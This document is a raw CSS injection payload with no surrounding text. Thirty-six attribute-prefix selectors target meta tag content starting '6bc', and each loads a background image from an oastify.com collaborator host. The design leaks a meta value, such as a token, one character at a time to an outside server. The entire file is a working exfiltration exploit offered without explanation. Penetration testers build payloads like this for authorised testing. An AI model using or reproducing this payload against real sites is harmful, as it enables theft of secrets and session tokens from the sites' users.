meta, head {
 display: block;   
}
meta[content^="6bca"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bca");}
meta[content^="6bcb"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcb");}
meta[content^="6bcc"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcc");}
meta[content^="6bcd"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcd");}
meta[content^="6bce"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bce");}
meta[content^="6bcf"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcf");}
meta[content^="6bcg"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcg");}
meta[content^="6bch"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bch");}
meta[content^="6bci"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bci");}
meta[content^="6bcj"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcj");}
meta[content^="6bck"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bck");}
meta[content^="6bcl"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcl");}
meta[content^="6bcm"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcm");}
meta[content^="6bcn"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcn");}
meta[content^="6bco"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bco");}
meta[content^="6bcp"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcp");}
meta[content^="6bcq"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcq");}
meta[content^="6bcr"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcr");}
meta[content^="6bcs"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcs");}
meta[content^="6bct"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bct");}
meta[content^="6bcu"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcu");}
meta[content^="6bcv"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcv");}
meta[content^="6bcw"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcw");}
meta[content^="6bcx"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcx");}
meta[content^="6bcy"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcy");}
meta[content^="6bcz"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bcz");}
meta[content^="6bc0"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc0");}
meta[content^="6bc1"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc1");}
meta[content^="6bc2"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc2");}
meta[content^="6bc3"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc3");}
meta[content^="6bc4"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc4");}
meta[content^="6bc5"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc5");}
meta[content^="6bc6"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc6");}
meta[content^="6bc7"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc7");}
meta[content^="6bc8"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc8");}
meta[content^="6bc9"]{background: url("http://0tut5m8zcalhyvvg980pm64im9sbg0.oastify.com/6bc9");}
